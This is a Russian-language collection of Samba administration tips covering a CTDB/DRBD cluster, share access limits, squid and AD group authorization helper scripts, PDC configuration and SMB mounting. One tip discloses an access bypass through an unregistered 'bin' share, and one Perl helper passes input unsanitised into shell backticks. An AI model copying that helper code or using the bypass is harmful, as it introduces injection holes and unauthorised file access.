осуществляет управление демонами smbd и производит передачу управления демоном smbd в случае отказа узла. Подведем некоторые итоги Имеем следующее: -кластерную систему, которая используется как файловый сервер. Для этого используем службу Samba, запущенную одновременно на всех узлах - за её работу отвечает CTDB. Данные хранятся на локальных дисках, реплицируются с помощью DRBD, доступ к ним может осуществляться одновременно обоими узлами кластера(для этого и нужна кластерная ФС - GFS2). Таким образом, потеря данных исключена, доступность сервисов обеспечена. Служба HeartBeat в данном случае не используется, так как CTDB выполняет эти функции для Samba-сервера. В результате, получим: высокопроизводительный файловый сервер, обеспечивающий 100%-ю целостность данных и непрырывность предоставляемых сервисов. Установка, настройка и запуск То, что описано ниже, делаем на всех узлах кластера. Для начала собираем CTDB из исходных текстов cd ctdb ./autogen.sh ./configure make make install После этого необходимо создать и отредактировать основные конфигурационные файлы, служащие для запуска и работы CTDB. 1. Создать файл /etc/sysconfig/ctdb.sysconfig: CTDB_RECOVERY_LOCK="/synchronized/lock" CTDB_PUBLIC_INTERFACE=eth0 CTDB_PUBLIC_ADDRESSES=/usr/local/etc/ctdb/public_addresses CTDB_MANAGES_SAMBA=yes CTDB_INIT_STYLE=redhat CTDB_NODES=/usr/local/etc/ctdb/nodes CTDB_LOGFILE=/var/log/log.ctdb В данном случае, этот файл не использует все возможные параметры, а лишь те, которые необходимы в данном случае: CTDB_RECOVERY_LOCK="/synchronized/lock" - этот параметр описывает месторасположение файла, в котором хранится записи о том, какой из узлов является мастером восстановления. Файл lock должен располагаться на общем хранилище и быть доступным всем нодам,использующим CTDB. CTDB_PUBLIC_INTERFACE=eth0 - этот параметр описывает сетевой интерфейс, на котором в данный момент времени поднято сетевое соединение. CTDB_PUBLIC_ADDRESSES=/usr/local/etc/ctdb/public_addresses - этот параметр определяет файл, содержащий список IP-адресов, по которым клиенты, использующие Samba для доступа к файловым ресурсам, посылают запросы на соединение. Распределением этих адресов по нодам занимается CTDB. CTDB_MANAGES_SAMBA=yes - этот параметр определяет, будет ли CTDB управлять запуском Samba-сервера вместо стандартных сценариев управления, которые реализует операционная система. CTDB_INIT_STYLE=redhat - этот параметр описывает сценарии запуска служб для различных операционных систем. CTDB_NODES=/usr/local/etc/ctdb/nodes - этот параметр определяет файл, в котором хранится информация об узлах кластера. CTDB_LOGFILE=/var/log/log.ctdb - этот параметр определяет лог- файл, использующийся службой CTDB. 2. Создать файл /usr/local/etc/ctdb/nodes: 192.168.1.1 192.168.1.2 Здесь IP-адрес 192.168.1.1 принадлежит первой ноде, IP-адрес 192.168.1.2 - второй. 3. Создать файл /usr/local/etc/ctdb/public_addresses: 192.168.0.200/24 eth0 Это IP-адрес, за которым в DNS сервере закреплено доменное имя Samba-сервера. Далее собираем самбу cd samba-3.3.8/source ./autogen.sh ./configure --with-ctdb=/usr/src/ctdb --with-cluster-support \ --enable-pie=no --with-shared-modules=idmap_tdb2 make make install /usr/src/ctdb - каталог с исходными текстами CTDB, установленными ранее. Правим smb.conf Эти два параметра обязательно надо добавить в global. Остальное, по Вашим запросам. clustering = Yes idmap backend = tdb Запуск Samba Сначала запускаем CTDB на всех узлах кластера. /usr/local/sbin/ctdbd Проверяем, запустилось ли. ctdb status Если все конфигурационные файлы корректны,будет такое: Number of nodes:2 pnn:0 192.168.1.1 OK (THIS NODE) pnn:1 192.168.1.2 OK Generation:1087563258 Size:2 hash:0 lmaster:0 hash:1 lmaster:1 Recovery mode:NORMAL (0) Recovery master:0 Проверяем для начала параметры smb.conf /usr/local/samba/bin/testparm Load smb config files from /usr/local/samba/etc/smb.conf Processing section "[public]" Loaded services file OK. Server role: ROLE_STANDALONE Запускаем самбу: /usr/local/samba/sbin/smbd -D /usr/local/samba/sbin/smbd -D Далее, все как обычно, только не забывайте, что это не кластер, и все действия должны быть выполнены на всех узлах. Тестирование Для сравнения производительности Samba-сервера с использованием CTDB и без использования CTDB, а также возможностей файловой системы (общего хранилища) используется ряд тестовых модулей. Скорость чтения данных Чтение(MB/sec) Клиент 1 2 3 4 Samba без CTDB 2,15 2,16 2,13 2,09 Samba + CTDB 24,73 23,42 23,26 23,15 Сервер был доступен по кналу 1 Гб/с, поэтому суммарно использовано около 75% пропускной способности. Скорость записи идентична, не намного уступает, определяется скорее возможностями файловой системы. Замечу, что с ростом узлов (до 8) скорость доступа к данным (скорость чтения/записи) стремительно растет. Заключение Предложенный вариант кластеризации Samba позволяет достичь некоторых результатов: 1. Высокая надежность и отказоустойчивость (читайте про CTDB). Потеря данных исключена. 2. Показатели производительности по сравнению с 1-серверными системами отличные. Конфигурация годится для организации бюджетного кластерного файлового сервера, и при грамотной организации каналов связи (между узлами, клиент- сервер) обеспечит отличный уровень производительности. Список источников * http://ctdb.samba.org * http://wiki.samba.org/index.php/Clustered_Samba

Примеры ограничения доступа пользователям в Samba (доп. ссылка 1) [комментарии]

Разрешение доступа к разделу только из определенной подсети: Для нужного имени share-секции smb.conf добавляем: [share] hosts allow = 192.168.2. 127.0.0.1 hosts deny = ALL Разрешение доступа по именам пользователей или группам: [share] valid users = user1 user2 @group1 @group2 Делегирование прав на запись только заданным пользователям, остальным доступ только для чтения: [share] read only = yes write list = user1 user2 @group1 @group2 Пример, доступ только на чтение к разделу [sales] всем, кроме пользователей tom и jerry, имеющих возможность записи: [sales] comment = All Printers path = /nas/fs/sales read only = yes write list = tom jerry Для более надежной защиты рекомендуется ограничить доступ к smbd (139 порт) через пакетный фильтр, разрешив обращение только с адресов локальной сети.

Некоторые распространённые сообщения об ошибках в Samba (доп. ссылка 1) Автор: skeletor [комментарии]

Некоторые сообщения об ошибках в логах samba. 1) "printing/pcap.c:pcap_cache_reload" В случае неиспользования системы печати для предотвращения таких сообщений в конфиге sambа в секции global добавляем: load printers = no show add printer wizard = no printing = none printcap name = /dev/null disable spoolss = yes 2) "getpeername failed. Error was Transport endpoint is not connected" Данное сообщения означает скорее всего, что в вашей сети используются машины под управлением Windows XP. Дело в том, что Windows 98 для доступа к ресурсам сети использовал порт 139. Windows XP же используется 2 порта: 139 и 445 и действует следующим образом. Она пытается открыть соединения сразу по 2-ум портам, если ей это удаётся, она рубит соединение на 139 порту, посылая сообщение samb'e. Отсюда вывод. Для совместимости со старыми (а возможно и просто классической совместимости) используйте порт 139. Для этого в конфиге samb'ы, в секции global пишем такое: smb ports = 139 3) "smbd/close.c:close_remove_share_mode", "close_remove_share_mode: Could not delete share entry for file" Добавьте в описание шары, на файлах которой вываливаются такие сообщения следующее locking = no 4) "Global parameter log level found in service section!", "Global parameter syslog found in service section!" Это значит, что параметр log level и syslog описан не в опции, а в описаниях шар. Решение: перенести параметр из описаний шар в секцию 5) "Packet send failed to 127.0.0.1(137) ERRNO=Permission denied", "send_netbios_packet: send_packet() to IP 127.0.0.1 port 137 failed" Побороть это мне помогло добавление 127.0.0.1/8 в строку interfaces в smb.conf

Увеличение скорости работы samba (доп. ссылка 1) Автор: Денис Корявов [комментарии]

Установленная из пакета в ALT Linux samba демонстрировала невысокую скорость передачи данных: 1Мб/сек на прием и 700 Кб/сек на отдачу файлов по 100 Мбит ethernet сети. Поискав на бескрайних просторах интернета, мне удалось найти следующее решение: В файл /etc/samba/smb.conf в опцию [global] вставьте следующие строки: [global] max xmit = 64000 socket options = IPTOS_LOWDELAY TCP_NODELAY SO_SNDBUF=64000 SO_RCVBUF=64000 SO_KEEPALIVE Благодаря данным настройкам, пиковые значения скорости передачи данных по сети у меня увеличились до 7.5Мб/сек на прием и 4 Мб/сек на отдачу файлов.

Автоматическое создание домашних директорий для пользователей в Samba (доп. ссылка 1) Автор: Князь [комментарии]

Возникла необходимость, чтобы при обращении к серверу Samba если отсутствует создавалась домашняя папка для пользователя домена. Сделать это можно задействовав стандартный PAM модуль pam_mkhomedir. Сперва убедитесь что smbd собран с поддержкой PAM smbd -b | grep WITH_PAM WITH_PAM Если PAM не поддерживается, соберите Samba из исходников с ключом "--with-pam". В файл "/etc/smb.conf" (секция "global") добавляем obey pam restrictions = Yes Создаем шару для домашних папок пользователей [homes] valid users = DOMAIN\%S read only = no browseable = no create mode = 0600 directory mode = 0700 По умолчанию Samba считает, что домашние папки пользователей находятся в "/home/DOMAIN/user". Нам надо создать директорию "/home/DOMAIN", так как pam_mkhomedir не умеет создавать вложенные директории sudo mkdir /home/DOMAIN Добавляем в файл "/etc/pam.d/samba" session required pam_mkhomedir.so umask=0077

Пример блокирования файлов по расширениям на samba сервере (доп. ссылка 1) Автор: izya12 [комментарии]

Пример запрещения записи файлов по расширению (veto files переписать в одну строку): [SOUND] path = /mnt/sde/music comment = звуковой-сервер username = roma,vnelubin,gtcvet,eolax,mlapin,kkorobejnikov only user = yes public = yes writable = yes create mode = 0775 force create mode = 0775 directory mode = 0775 force directory mode = 0775 veto oplock files = /*.mp3/*.wav/ veto files = /*.a*/*.A*/*.b*/*.B*/*.c*/*.C*/*.D*/*.d*/*.E*/*.e*/*.F*/*.f*/*.G*/*.g*/*.H*/*.h* /*.I*/*.i*/*.J*/*.j*/*.K*/*.k*/*.L*/*.l*/*.N*/*.n*/*.O*/*.o*/*.P*/*.p*/*.Q*/*.q* /*.R*/*.r*/*.S*/*.s*/*.T*/*.t*/*.U*/*.u*/*.Y*/*.y*/*.V*/*.v*/*.X*/*.x*/*.Z*/*.z* /*.1*/*.2*/*.3*/*.4*/*.5*/*.6*/*.7*/*.8*/*.9*/*.0*/*.vob/*.VOB/*.iso/*.ISO/*.nrg /*.NRG/*.IFO/*.ifo/*.BUP/*.bup/*.zip/*.ZIP/*.rar/*.RAR/*.TXT/*.txt/*.TAR/*.tar /*.EXE/*.exe/*.DLL/*.dll/*.CFG/*.cfg/*.HT*/*.ht*/*.aa*/*.ab*/*.ac*/*.ad*/*.ae* /*.af*/*.ag*/*.ah*/*.ai*/*.aj*/*.ak*/*.al*/*.am*/*.an*/*.ao*/*.ap*/*.aq*/*.ar* /*.as*/*.at*/*.au*/*.ay*/*.ax*/*.az*/*.wb*/*.wc*/*.wd*/*.we*/*.wf*/*.wg*/*.wh* /*.wi*/*.wj*/*.wk*/*.wl*/*.wm*/*.wn*/*.wo*/*.wp*/*.wq*/*.wr*/*.ws*/*.wt*/*.wu* /*.wy*/*.wx*/*.wz*/*.wv*/ delete veto files = yes Для самбы версии 3 и выше регистр значения не имеет. Для разрешения записи, но скрытия для чтения, нужно использовать: hide veto files = yes ещё пример: veto oplock files = /*.xls/*.XLS/*.mdb/*.MDB/*.ldb/*.LDB/ veto files = /*.avi/*.mp*

apache2 + mod_ntlm2 на FreeBSD (доп. ссылка 1) Автор: Comatoz [комментарии]

Прозрачная авторизация пользователя через его доменную учетную запись Использовавшие источники http://www.lissyara.su/?id=1510&commented=1#comment_2138 http://wiki.bestpractical.com/view/NtlmAuthentication В портах появился, но не собирается как надо (на 1.10.07 г.), поэтому cd /usr/ports/www/mod_ntlm2 Необходимо поправить файл mod_ntlm.c make fetch && make extract diff mod_ntlm2-0.1/mod_ntlm.c mod_ntlm2-0.1-fixed/mod_ntlm.c 590c590,596 < apr_pool_sub_make(&sp,p,NULL); --- > /* > * apr_pool_sub_make(&sp,p,NULL); > * > * This function call is not longer available with apache 2.2 > * Try replacing it with apr_pool_create_ex() > */ > apr_pool_create_ex(&sp,p,NULL,NULL); Теперь собираем и устанавливаем make install Пример настройки /usr/local/etc/apache22/Includes/nagios.conf ... ScriptAlias /nagios/cgi-bin/ /usr/local/www/nagios/cgi-bin/ Alias /nagios/ /usr/local/www/nagios/ Alias /nagios /usr/local/www/nagios/ <Location /nagios/cgi-bin> AuthType NTLM NTLMAuth on NTLMAuthoritative on NTLMDomain NAME_DOMAIN # ИМЯ домена NTLMServer dc1 # имя PDC NTLMBackup dc2 # имя BDC Require valid-user </Location> ... Если обращаться из IE - все работает, IE отдает данные авторизации любому. Если обращаться из Mozilla Firefox не будет работать - FF не отдает данные авторизации кому попало, сначала надо определить кому можно отдавать. Для этого в FF(about:config) в параметре network.automatic- ntlm-auth.trusted-uris установить имя сервера которому можно отдавать данные авторизации.

Создание общедоступного по SMB/CIFS протоколу хранилища файлов (доп. ссылка 1) [обсудить]

smb.conf: interfaces = lo eth1 bind interfaces only = true ... security = share ... guest account = nobody ... [Guest Share] comment = Guest access share path = /path/to/dir/to/share browseable = yes read only = yes guest ok = yes

Авторизация пользователей по доменным группам AD в squid (доп. ссылка 1) Автор: Nichls [комментарии]

В squid.conf #Здесь описываем внешие ACL external_acl_type InetGroup-proxy-08-20ww %LOGIN /usr/local/squid/libexec/wbinfo_group.pl # accesse in internet in work week from 08-00 to 20-00 external_acl_type InetGroup-proxy-08-20aw %LOGIN /usr/local/squid/libexec/wbinfo_group.pl # accesse in internet in all week from 08-00 to 20-00 external_acl_type InetGroup-proxy-00-24all %LOGIN /usr/local/squid/libexec/wbinfo_group.pl # accesse in internet in all week from 00-00 to 24-00 # Проверь свои пути auth_param ntlm children 20 auth_param ntlm program /usr/local/samba/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp auth_param ntlm max_challenge_reuses 0 auth_param ntlm max_challenge_lifetime 2 minutes auth_param basic children 20 auth_param basic program /usr/local/samba/bin/ntlm_auth --helper-protocol=squid-2.5-basic auth_param basic realm Squid proxy-caching web server auth_param basic credentialsttl 2 hours # Говорим, что нужна авторизация acl you_domain proxy_auth REQUIRED # Разграничиваем доступ по времени acl work-week time MTWHF 08:00-20:00 # Доступ с 08-00 до 20-00 с понедельника по пятницу acl all-week time SMTWHFA 08:00-20:00 # Доступ с 08-00 до 20-00 всю неделю acl all-time time SMTWHFA 00:00-24:00 # Доступ круглосуточно всю неделю # Осуществляем проверку на принадлежность к нужно группе acl InetAccess-proxy-08-20ww external InetGroup-proxy-08-20ww proxy-08-20ww acl InetAccess-proxy-08-20aw external InetGroup-proxy-08-20aw proxy-08-20aw acl InetAccess-proxy-00-24all external InetGroup-proxy-00-24all proxy-00-24all # Собираем все в кучу и проверяем на предмет получения дуступа к ИНТЕРНЕТ http_access allow you_domain work-week InetAccess-proxy-08-20ww http_access allow you_domain all-week InetAccess-proxy-08-20aw http_access allow you_domain all-time InetAccess-proxy-00-24all ---------------------- proxy-08-20ww, proxy-08-20aw, proxy-00-24all - Группы в домене. В них заносишь тех юзеров, которым разрешен доступ. wbinfo_group.pl - Используй именно этот скрипт. В том, что идет в комплекте со squid имеется ошибка. Здесь она исправлена. #!/usr/bin/perl -w # # external_acl helper to Squid to verify NT Domain group # membership using /usr/local/samba/bin/wbinfo # # This program is put in the public domain by Jerry Murdock # <jmurdock@itraktech.com>. It is distributed in the hope that it will # be useful, but WITHOUT ANY WARRANTY; without even the implied warranty # of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # # Author: # Jerry Murdock <jmurdock@itraktech.com> # # Version history: # 2002-07-05 Jerry Murdock <jmurdock@itraktech.com> # Initial release # # external_acl uses shell style lines in it's protocol require 'shellwords.pl'; # Disable output buffering $|=1; sub debug { # Uncomment this to enable debugging print STDERR "@_\n"; } # # Check if a user belongs to a group # sub check { local($user, $group) = @_; $groupSID = `/usr/local/samba/bin/wbinfo -n "$group"`; # chop $groupSID; # because wbinfo -n also returns the group number $groupSID = substr($groupSID,0,index($groupSID," ",0)); $groupGID = `/usr/local/samba/bin/wbinfo -Y "$groupSID"`; chop $groupGID; # &debug( "User: -$user-\nGroup: -$group-\nSID: -$groupSID-\nGID: -$groupGID-"); return 'OK' if(`/usr/local/samba/bin/wbinfo -r \Q$user\E` =~ /^$groupGID$/m); return 'ERR'; } # # Main loop # while (<STDIN>) { chop; &debug ("Got $_ from squid"); ($user, $group) = &shellwords; $ans = &check($user, $group); &debug ("Sending $ans to squid"); print "$ans\n"; } ---------------------------------------------------------------------------------------------------------- smb.conf [global] workgroup = YOU-DOMAIN realm = YOU-DOMAIN.RU netbios name = demon server string = Proxy Server hosts allow = 10. 127. winbind separator = \\ # Обрати на это внимание winbind use default domain = yes winbind uid = 10000-20000 winbind gid = 10000-20000 winbind enum users = yes winbind enum groups = yes template homedir = /home/winnt/%D/%U template shell = /usr/local/bin/bash max log size = 50 security = domain password server = srv1 srv3 encrypt passwords = yes srv1 и srv3 - PRIMARY and BACKUP контроллеры домена ---------------------------------------------------------------------------------------------------------- root@demon#tail -f /usr/local/squid/var/logs/cache.log Got YOU-DOMAIN\\user1 proxy-08-20ww from squid Sending ERR to squid Got YOU-DOMAIN\\user1 proxy-08-20aw from squid Sending ERR to squid Got YOU-DOMAIN\\user1 proxy-00-24all from squid Sending OK to squid # Тут явно видно, что пользователя user1 нашли в группе proxy-00-24all и squid'у передано OK Got YOU-DOMAIN\\user2 proxy-08-20ww from squid Sending OK to squid Got YOU-DOMAIN\\user3 proxy-08-20ww from squid Sending OK to squid root@demon#tail -f /usr/local/squid/var/logs/access.log 1147851551.270 20 10.66.107.56 TCP_IMS_HIT/304 251 GET http://img.mail.ru/mail/ru/css/mail-main1.css YOU-DOMAIN\user1 NONE/- text/css Небольшое дополнение: Информация о членстве в группе хранится в кеше squida (по умолчанию) 1 час, а в кеше Winbinda - 300 сек. Чтобы не ждать столько времени при перемещении пользователя из одной группы в другую советую добавить в squid.conf при описании внешиx ACL опцию ttl,примерно так: external_acl_type InetGroup-proxy-08-20ww ttl=0 %LOGIN /usr/local/squid/libexec/wbinfo_group.pl а в smb.conf: [global] winbind cache time = 0

Интеграция VPN на базе mpd в Active Directory. Автор: spherix [комментарии]

Было дано: - Домен на Windows2003 с поднятым Kerberos. - FreeBSD на шлюзе, куда должны были подключаться пользователи. - VPN-демон mpd. Задача: заставить mpd брать пароли из домена. Решение: - Ставим третью самбу с поддержкой кербероса. - Настраиваем керберос - Подсоединяем самбу в домен. - Оставляем от нее только winbindd - Ставим freeradius. - Сцепляем радиус с самбой. - Скручиваем mpd с радиусом и настраиваем сам mpd. Итог: управляем учетными записями VPN-пользователей через обычные средства AD, а не пишем руками данные в файл. Примечание1. Документация гласит, что можно связать радиус с керберосом. То есть теоретически можно отказаться от самбы. Я так не делал, поскольку подцепить через самбу мне лично было проще. Примечание2. Если использовать poptop, то можно не использовать радиус, а использовать ntlm_auth из самбы. Тоже вариант. Файлы конфигурации: https://www.opennet.ru/base/net/mpd_win2003.txt.html

Samba 3 в качестве PDC. Автор: AlxJoin [комментарии]

1.Программные пакеты которые пригодятся при установке и настройке PDC. samba-client-3.0.23-0.1.14rc2 или любая другая версия не ниже третьей. samba-3.0.23-0.1.14rc2 или любая другая версия не ниже третьей. webmin-1.270-1 для администрирования через веб-интерфейс. Пакет Samba последней версии можно скачать с сайта разработчика http://www.samba.org и программу для администрирования через веб-интерфейс по адресу http://www.opencountry.com Для начала устанавливаем Samba и Webmin. После того как установили Samba нам потребуется отредактировать файл smb.conf который находится в директории /etc/samba. Пример рабочего файла который можно не править. # smb.conf is the main Samba configuration file. You find a full commented # version at /usr/share/doc/packages/samba/examples/smb.conf.SUSE if the # samba-doc package is installed. # Date: 2006-05-02 [global] workgroup = univer.local printing = cups printcap name = cups printcap cache time = 750 cups options = raw map to guest = Bad User include = /etc/samba/dhcp.conf logon path = \\%L\profiles\.msprofile logon home = \\%L\%U\.9xprofile logon drive = P: add machine script = /usr/sbin/useradd -c Machine -d /var/lib/nobody -s /bin/false %m$ domain logons = Yes domain master = Yes local master = Yes netbios name = netserv1 os level = 65 preferred master = Yes security = user idmap gid = 10000-20000 idmap uid = 10000-20000 [homes] comment = Home Directories valid users = %S, %D%w%S browseable = No read only = No inherit acls = Yes [profiles] comment = Network Profiles Service path = %H read only = No store dos attributes = Yes create mask = 0600 directory mask = 0700 [users] comment = All users path = /home read only = No inherit acls = Yes veto files = /aquota.user/groups/shares/ [groups] comment = All groups path = /home/groups read only = No inherit acls = Yes [printers] comment = All Printers path = /var/tmp printable = Yes create mask = 0600 browseable = No [print$] comment = Printer Drivers path = /var/lib/samba/drivers write list = @ntadmin root force group = ntadmin create mask = 0664 directory mask = 0775 [netlogon] comment = Network Logon Service path = /var/lib/samba/netlogon write list = root Для того что бы администрировать сервер придется поставить программу удаленного администрирования через веб-интерфейс - Webmin. После установки к серверу можно подключится через веб интерфейс по адресу https://localhost:10000 и там в службах есть настройка SMB-сервера, где можно Linux-пользователей копировать в SMB-пользователей.

Сборка Samba с авторизацией в домене 2003 на FreeBSD Автор: Артём [комментарии]
Решил рассказать про проблемы с которыми я столкнулся при сборке самбы:

В самбе 3.14a наблюдается некорректная запись в логи даже при правильной настройке.
Были проблемы при сборке с heimdal. Команда id не выводила пользователей доменов при правильных конфигах, хотя всё работало.
Чтобы керберос работал по tcp надо писать tcp/имя сервера:порт, а не kdc = tcp/server !
Пока не обновил порты и не пересобрал базу портов ( смотрите статью "хитрости работы с портами") 5 керберос не собирался.
После того как я решил переджойнить машину в домен, билет не хотел обновляться ни в какую. Пришлось ждать 10 часов пока он умрёт. Желающие могут поразвлекаться с утилитой управления билетами, которая входит в 2003 recourse kit и называется kutil.
Решение - сразу обновить порты собирать только новое ! 3.0.22 на данный момент + 5 kerberos . Сразу включать его работу через tcp . После того как всё завелось ничего не переджойнивать и преспокойно раздавать шары.
Без обновлений портов работала связка 3.0.14a + krb4 но ошибка в логи валилась и на живой домен я так и не смог это поднять , только на виртуальной машине.

SQUID в сети SAMBA + LDAP, использование групповых ACL Автор: Афлетдинов Андрей [комментарии]

Имеем: 1. Учетные записи пользователей и групп в LDAP 2. Поднят домен на SAMBA-3. На стороне сервера SQUID конфигурируем: 1. /etc/ldap.conf и /etc/nsswith.conf в результате getent passwd и getent group выдает список пользователей и групп 2. минимальный /etc/smb.conf: [global] workgroup = domain netbios name = squid load printers = no printcap name = /dev/null security = domain password server = sambaserver local master = no os level = 33 domain master = no preferred master = no wins support = no winbind use default domain = yes winbind cache time = 1200 3. Заводим в домен net -Uadministrator join 4. Запускаем winbind, но при этом в /etc/nsswith.conf его _не_прописываем_ 5. разрешаем чтение pipe winbindd процессу squid любым доступным способом, например: setfacl -g:squid:rx /var/lib/samba/winbindd_privileged 6. samba в дальнейшем не нужна 7. далее в squid.conf: # стандартные опции авторизации auth_param ntlm program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp auth_param ntlm children 5 auth_param ntlm max_challenge_reuses 0 auth_param ntlm max_challenge_lifetime 2 minutes auth_param ntlm use_ntlm_negotiate off auth_param basic program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-basic auth_param basic children 5 auth_param basic realm Squid proxy-caching web server auth_param basic credentialsttl 2 hours auth_param basic casesensitive off # авторизация обязательна acl NTLMauth proxy_auth REQUIRED # определяем типы ACL external_acl_type type_ldap_group1 ttl=60 children=1 %LOGIN /usr/lib/squid/ squid_ldap_group.pl -b "cn=group1,ou=group,dc=ldap,dc=local" -H ldaps://ldap.local external_acl_type type_ldap_group2 ttl=60 children=1 %LOGIN /usr/lib/squid/squid_ldap_group.pl -b "cn=group2,ou=group,dc=ldap,dc=local" -H ldaps://ldap.local external_acl_type type_ldap_group3 ttl=60 children=1 %LOGIN /usr/lib/squid/squid_ldap_group.pl -b "cn=group3,ou=group,dc=ldap,dc=local" -H ldaps://ldap.local # и сами ACL acl acl_group1 external type_ldap_group1 acl acl_group2 external type_ldap_group2 acl acl_group3 external type_ldap_group3 ВСЕ. Дальше с ними можно работать как с обычными ACL, начиная от простого http_access allow acl_group1 и заканчивая в вариантах пула и по времени. При изменении информации в группе LDAP, squid примет изменения только через время определенное в ttl, таким образом перезапускать его как -kreconfigure нет необходимости, что уже плюс! Да вот еще, сам скрипт /usr/lib/squid/squid_ldap_group.pl очень прост: #!/usr/bin/perl # # squid ldap group # mailto:afletdinov\@dc.baikal.ru # use Getopt::Long qw(:config no_ignore_case); use Net::LDAP; use strict; # const my $VERSION = '20051122'; # variables my $ldap; my $user; my $result; #my $pass; my $opt_groupdn = ''; my $opt_binddn = ''; my $opt_bindpasswd = ''; my $opt_secretfile = ''; my $opt_uri = ''; GetOptions( 'b=s' => \$opt_groupdn, 'D=s' => \$opt_binddn, 'w=s' => \$opt_bindpasswd, 'W=s' => \$opt_secretfile, 'H=s' => \$opt_uri ); # check: requires param &usage unless($opt_groupdn and $opt_uri); #connect $ldap = Net::LDAP->new($opt_uri) or die("connect $opt_uri failed!"); # bind if($opt_binddn){ # check: secretfile if($opt_secretfile){ open(FILE, "<$opt_secretfile") or die("error read $opt_secretfile"); $opt_bindpasswd = <FILE>; close(FILE); } $result = $ldap->bind($opt_binddn, password=>$opt_bindpasswd); # anonymous bind }else{ $result = $ldap->bind(); } $result->code and die($result->error); # use buffers off $| = 1; # BASIC while(<STDIN>){ chomp; # format: user password unless(/^(\S+)\s*(\S*)$/){ print "ERR\n"; next; } $user = $1; #$pass = $2; # check: valid group $result = $ldap->search(base=>$opt_groupdn, , filter=>"(memberUid=$user)"); # not found unless($result->count){ print "ERR\n"; next; } # auth: OK group: OK print "OK\n"; } exit; sub usage(){ print <<EOF; squid_ldap_group.pl version $VERSION Usage: squid_ldap_group.pl -b "cn=www-access,ou=group,dc=ldap,dc=local" -H ldaps://ldap.local -b GroupBaseDN (REQUIRED) -H LdapURI (REQUIRED) -D BindDN -w BindPasswd -W SecretFile EOF exit; }

Работа samba совместно с group policy Автор: Andrey [комментарии]
Group policy работают по схеме NT4. Для этого необходим poledit.exe winnt.adm common.adm.
Запускаем poledit, загружаем необходимые шаблоны, редактируем default user либо отдельного пользователя, либо группу пользователей потом сохраняем в файл ntconfig.pol
Почти все настройки определены в одном файле 1_ALLinONE.adm Только одно отличие, для win2k и winxp(win2k3) необходимы разные шаблоны. Его можно найти здесь.
Сам файл ntconfig.pol необходимо разместить в параметре самбы netlogon path.
Различия типов операционных систем решается просто через самбу в параметре netlogon path необходимо добавить параметр %a (тип клиентской системы), и в создать папки Win2K WinXP Win2K3, где и будут размещаться необходимый файлы ntconfig.pol

Как запустить Samba в jail (FreeBSD) Автор: TLM [комментарии]

Мне удалось запустить Samba 3.0.11 в jail на FreeBSD 4.10 только после того, как в smb.conf были вписаны следующие строчки: interfaces = 192.168.1.123/32 bind interfaces only = yes

Использование smbfs через autofs Автор: Konstantin [комментарии]

Пишем скрипт /etc/auto.smbfs примерно такой: #!/bin/sh a="${1/@//}" a="${a//\ /\\ }" echo -fstype=smbfs,username=guest,password=fmask=666,iocharset=cp1251,codepage=cp866 :"//$a" Параметры - по вкусу. automount как-то небрежно относится к пробелам в имени, но так работает. Ставим на файл бит исполнения: chmod +x /etc/auto.smbfs Далее в /etc/auto.master добавляется строка /var/autofs/smb /etc/auto.smbfs где /var/autofs/smb - точка монтирования. Стартуем: /etc/init.d/autofs restart Для удобства: ln -s /var/autofs/smb /smb Теперь можно обращатся к шаре "share" на хосте "host" вот так: cd /smb/host@share по IP тоже работать должно. Всё написанное верно для дистрибутива debian sarge. Нужны пакеты autofs и smbfs. Желающие могут расширить фунциональность, прикрутив к скрипту передачу логина\пароля через путь.

Как выключить w2k машину средствами samba (доп. ссылка 1) Автор: arruah [комментарии]

rpcclient -c shutdowninit -U <пользователь с правами администратора%пароль> <ip удаленной машины>

шара bin в Samba Автор: awk [комментарии]

Если подключиться к шаре bin на сервере samba, и пользователь bin не заведен в smbpasswd, то получим доступ к / под freebsd и к /bin под linux. Причем доступ получаем от имени пользователя, под которым залогонились. Т.е., в большинстве случаев, пользователь может получить доступ, как минимум по чтению, даже если шара от него закрыта, используя шару bin. Решается, путем добавления пользователя bin в smbpasswd или созданием и направлением шары bin на /dev/null

Монтирование SMB ресурса в FreeBSD Автор: Николай Сеньков [комментарии]

Пересобираем ядро: options NETSMB #SMB/CIFS requester options NETSMBCRYPTO #encrypted password support for SMB options LIBMCHAIN #mbuf management library options LIBICONV options SMBFS Коннектимся к удаленному SMB серверу: smbutil login //jwarner@smbserver1 Монтируем русурс: mount_smbfs -N //jwarner@smbserver1/sharename /backup Отсоединяемся от SMB сервера: smbutil logout //jwarner@smbserver1

Символы подстановки переменных в Samba. Автор: P.Kert [обсудить]

%S Имя текущей службы %P Корневой каталог текущей службы %u Пользователь текущей службы %g Основная группа %u %U Имя пользователя для сеанса (может отличаться от имени,запрошенного клиентом) %G Основная группа %U %H Домашний каталог пользователя %v Версия Samba %h Имя хоста, на котором работает Samba %m NetBIOS-имя компьютера-клиента %L NetBIOS имя сервера %M Имя хоста для компьютера-клиента %N Имя NIS-сервера домашних каталогов. Значение определяется при помощи файла настройки системы NIS auto map. Если вы скомпилировали Samba без automount, то значение совпадает с установленным для сервера NetBIOS именем %p Путь к домашнему каталогу службы. Определяется при помощи файла настройки системы NIS auto map, как %N:%p %R Выбранный после установления соединения уровень протокола %d Номер текущего серверного процесса %a Операционная система клиента (значение может быть неверным) %I IP-адрес клиентской машины %T Текущие дата и время

Как примонтировать удаленный SMB диск с русскими именами файлов. [комментарии]

Получаем список ресурсов: smbclient -L 192.168.0.9 Монтируем: smbmount "//192.168.0.9/DISK (H)" /mnt/0 -o guest,iocharset=koi8-r,codepage=cp866

Как сделать Samb'у контроллером домена Windows NT/2000 (доп. ссылка 1) Автор: Pasha Kustov [комментарии]

smb.conf: Domain logons=yes domain master=yes local master=yes os level=63 preferred master=yes encrypt passwords=yes admin users=root pasha adm username map=/etc/samba/users.map admin group=@wheel /etc/samba/users.map: root=administrator # groupadd -d /home/samba -g 6666 SambaComputers Для каждой машины-члена домена в сети: # useradd -d /home/samba -u 66?? -g 6666 -s /bin/false ИмяМашины$ Затем: # smbpasswd -a ИмяМашины$ (с пустым паролем)

Как включить поддержку SMBFS в FreeBSD и примонтировать удаленный windows ресурс. [комментарии]

